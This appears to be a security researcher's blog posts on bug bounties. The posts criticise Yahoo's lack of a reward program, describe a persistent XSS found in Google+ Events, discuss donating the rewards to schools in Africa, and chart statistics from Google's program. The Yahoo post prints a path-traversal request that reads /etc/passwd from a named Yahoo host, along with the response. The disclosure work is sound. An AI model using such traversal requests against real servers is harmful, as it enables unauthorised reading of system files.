Yahoo, please start with a Vulnerability Reward Program

Yahoo Japan suspects up to 22 million user IDs may have been leaked; does not include passwords #breaking
— Reuters Tech (@ReutersTech) May 17, 2013

This wouldn't happen if Yahoo had a Vulnerability Reward Program like Google, Facebook, Mozilla, Paypal, Etsy, etc (list of reward programs @bugcrowd). Last year I discovered a LFI/Path Traversal vulnerability in a REST-API used by Yahoo Mail and I got a automated mail from their mailer. I refused to report more bugs to them because it's boring to talk with bots.

GET /v2/xframe/../../../../../../../etc/passwd?bc
HTTP/1.1
Host: prod1.rest-notify.msg.yahoo.com

HTTP/1.1 200 OK
Connection: close
Expires: Thu, 15 Apr 2020 20:00:00 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 29676

root:*:0:0:Charlie &:/root:/usr/local/bin/bash
toor:*:0:0:Bourne-again Superuser:/root:/bin/sh
daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
operator:*:2:5:System &:/:/sbin/nologin

Some minutes later I got a automated reply from Yahoo Security Contact

Nils,

Thank you for contacting Yahoo!.  These issues have been passed 
along to the correct teams to investigate.  Should a fix be required, 
we will again contact you and ask that you see the issues as resolved.

Thanks again,
Yahoo! Security Contact

Days later the issue was fixed. But no more replies from them!

Yahoo, please start with a Vulnerability Reward Program and get in touch with the community - before it's too late.

XSS bei Google - insgesamt $4600 für Schulen in Afrika

English version

Vor zwei Jahren startete Google sein Vulnerability Reward Program und bezahlt seitdem Findern sicherheitsrelevanter Fehler in seinen Web-Anwendungen Belohnungen. In Summe wurden bisher $704.909,50 (Stand Dez. 2012) ausbezahlt. Obwohl Google bei Spenden den eigentlichen Reward verdoppelt, wurden bisher lediglich $25.825 (Quelle S.42) an gemeinnützige Organisationen gespendet.

Letztes Jahr (Ethiopia gets a new school - thanks to a XSS in Google+) konnte ich, dank eines XSS Bugs auf Google+, eine Schule in Welkite/Äthiopien mit $2.600 unterstützen.

“Ich möchte Dir […] sehr für Dein Engagement danken. Deine/Die Spende von Google hat einen gewaltigen Entwicklungschritt möglich gemacht.” 

Hendrik Kempfert aus Hamburg von socialwaydown.com hat 2010 bei seinem Sabbatical (“Von Hamburg nach Capetown”) die Schule in Welkite besucht und viele Leute vor Ort kennengelernt. Inzwischen ist er mit den Projektinitiatoren eng befreundet. Hendrik konnte mir dann auch berichten, dass die Spende einen großen Fortschritt bewirkt hat.

Keita Haga aus Japan – ebenfalls Teilnehmer des Bounty Programms – spendete $1000 an das gleiche Projekt, was mich sehr gefreut hat.

Persistentes XSS bei Veranstaltungen in Google+ und bei Panoramio

Im Dezember 2012 hat mich Google für ein XSS bei Google+ und bei Panoramio mit jeweils $500 belohnt. Bei dem XSS in Google+ handelte es sich um ein persistent XSS in den Veranstaltungen (Events). Fügt man einen existierenden Ort zu einem Event hinzu, wird in einem Tooltip die genaue Adresse des Ortes angezeigt. Wichtig dabei, der Ort muss bereits bei Google vorhanden sein.

Suche nach einem Ort

Die Adresse wird beim Überfliegen mit der Maus in einem Tooltip angezeigt

Um die Adresse zu manipulieren, war es nötig, den entsprechenden POST Request zum Speichern des Events zu verändern. Am besten eignet sich dafür Burpsuite Pro oder ZAP Proxy vom OWASP Project.

Die Location selber wird durch eine ID festgelegt, der Name und die Adresse sind komplett veränderbar.

Nicht korrekt escaped war alles, was im Tooltip angezeigt wird. Es gab dann auch gleich sehr viele Snippets, auf denen das Event mit dem Tooltip angezeigt wurde, die dann auch entsprechend verwundbar waren.

Orte, an denen das XSS sichtbar war:

• das Event teilen (dann steht es bei jedem Follower in der Timeline)
• Benachrichtigung in der Notificationbar auf allen Google-Seiten mit der Menüleiste (document.domain für das iframe ist immer plus.google.com)
• Benachrichtigungsmails im Gmail (ebenfalls als iframe)
• auf der Event-Seite

Theoretisch hätte man mit diesem Fehler einen XSS-Wurm für Google+ bauen können – allerdings wäre durch den Tooltip noch ein wenig Nutzerinteraktion notwendig. Google hat den Fehler trotzdem innerhalb weniger Stunden geschlossen.

Ich habe auf Betterplace zwei spannende Projekte gefunden, die ich mit jeweils $1000 (753 €) unterstützen möchte. Beide Projekte versuchen Kindern eine Zukunft mit Bildung zu ermöglichen. Grundvoraussetzung dafür sind Gebäude und eine Umgebung, die zum Lernen geeignet ist.

$ 1000 für einen Kindergarten in Tomegbé / Togo

Aus der Projektbeschreibung für den neuen Kindergarten:

"Kindergarten für Togo" ist ein Projekt, welches von agbe e.V. und dem togoischen Partner Asmerade ins Leben gerufen wurde. Die Initiative stammt direkt aus der Bevölkerung von Tomegbé, die bei der Durch- und Weiterführung sehr stark beteiligt ist. Der Bauplan hierzu wurde von einem togoischen Architekturbüro erstellt und die drei Kindergärtnerinnen werden aus der Gemeinde von Tomegbé stammen.
Der Kindergarten wird für 120 Kinder einen Platz garantieren können. Doch nicht nur die Kinder profitieren davon, auch deren Mütter und damit die gesamte Gemeinschaft. Die wirtschaftliche Situation im Land ist sehr schlecht, die Mütter sind überlastet und die mangelhafte Hygiene lässt viele Kinder nicht einmal das Grundschulalter erleben. Die Gemeinde von Tomegbé sieht das Fehlen des Kindergartens als Schlüsselproblem einer besseren Zukunft an. 

$ 1000 für eine Grundschule in Ilketunjo / Äthiopien

Aus der Projektbeschreibung von Betterplace:

Die Kooperative Ilketunjo hat zwei Schulen, wobei insbesondere die weiter entlegene Schule – die sogenannte „Satellite School“ – unsere Hilfe benötigt. Das Gebäude der Schule besteht aus bereits zerfallenden Lehmwänden und einem Lehmboden, sanitäre Anlagen fehlen komplett. Die mangelnde Schulausstattung mit Möbeln wie Tischen, Bänken und Stühlen macht es fast unmöglich die rund 1.000 Kinder der Umgebung zu unterrichten.

Diese Situation führt dazu, dass die Schüler nur sehr widerwillig in die Schule gehen und oft über mehrere Tage nicht am Unterricht teilnehmen. Für uns ist es nur schwer vorstellbar, aber so lernen viele Kinder nicht einmal Grundlegendes wie lesen und schreiben.”

Betterplace die Crowdfunding Plattform für Hilfsprojekte

betterplace.org ist eine offene Spenden-Plattform im Internet. In Deutschland als gemeinnützig anerkannte Organisationen, aber auch andere Organisationen und Individualprojekte, können auf der Webseite um Geld-, Sach- oder Zeitspenden werben. Über betterplace.org wurden zwischen der Gründung 2007 und Ende April 2010 mehr als 2,5 Millionen Euro gespendet.

Ich würde mich freuen, wenn der eine oder andere auch seine Bug Bounty Rewards für eines der Projekte spendet.

• Kindergarten in Tomegbé / Togo
• Grundschule in Ilketunjo / Äthiopien

Follow @totally_unknown

News about Google's Vulnerability Reward Program

Recently Adam Mein spoke at AppSec USA 2012 and Kevin Stadmeyer at SysScan 360 in Beijing about Google's experience with the Web Vulnerability Reward Program. Both are Security Program Manager at Google.

• 31 October 2011 - Bug Bounty Panel with Adam Mein at OWASP AppSec 2012 (Video, Transcript)
• 13 December 2012 - Kevin Stadmeyer at SysScan 360 in Beijing, Conference Schedule

Kevin's slides are only available in PDF. But I tried to extract some numbers from the images and recreated the charts with Google Spreadsheets (charts below).

They told that they have paid for about 50/50 in terms of sensitive apps and non-sensitive apps. Even more in non-google.com domains and it's not surprising that 20% of people are responsible for ~80% of the bugs (http://en.wikipedia.org/wiki/Pareto_principle).

Whats else happened this year? In April the reward amounts increased up to $20,000 for RCE bugs on production servers. I'm not sure whether this incentive measure has led to more bug reports. I think most of the "low hanging fruits" are already discovered by the various tester in the world. The bug-tickets/month will now be dependent on how many changes Google makes every month to its applications.

Since October all application security informations are bundled into a new page. It included the new ranked "Hall of Fame", the publications of their security research and a listing with all security conferences where a Google employee was speaking.

Google's information security team has also recently hired one engineer from the VRP regulars. They hired also this year two new Security Program Manager. For me this is sign for a strong committment to the VRP and a sign to strengthen their long-term relationship with the security community.

In total Google has paid $ 704,909.50 since the beginning of VRP in end of 2010 for bugs in web applications.

Data Source
Data Source Money distribution heatmap by country

$410,000 in the first year of VRP and $704,909.50 in total at end of August 2012.

The country ranking looks like: Germany, USA, Poland, Japan, Israel, Brazil, Russia.

Some older insights and numbers from Google about VRP:

• 9 February 2011 - Update from Adam Mein in Google Online Security Blog
• 7 March 2011 - Slides from Adam Mein at SANS AppSec 2011